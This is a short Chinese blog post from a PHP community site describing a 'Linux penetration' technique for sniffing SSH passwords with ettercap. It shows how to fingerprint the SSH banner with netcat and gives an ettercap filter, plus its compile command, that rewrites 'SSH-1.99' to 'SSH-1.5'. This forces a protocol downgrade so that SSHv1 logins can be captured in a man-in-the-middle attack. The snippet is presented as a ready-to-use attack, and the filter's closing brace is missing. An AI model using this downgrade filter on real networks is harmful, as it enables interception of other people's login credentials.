热门标签 | HotTags
当前位置:  开发笔记 > 运维 > 正文

linux渗透:使用ettercap嗅探ssh口令

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nctargetip22。如果返回的版本号为SSH-1.99就表示在sshd_config中protcol为2,1。但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol2,1也一样

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。


花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter

 

  1. if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){ 
  2.  
  3. replace("SSH-1.99","SSH-1.5"); 
  4.  

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter,看看,是不是能嗅了?


推荐阅读
author-avatar
现实-不过如此
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有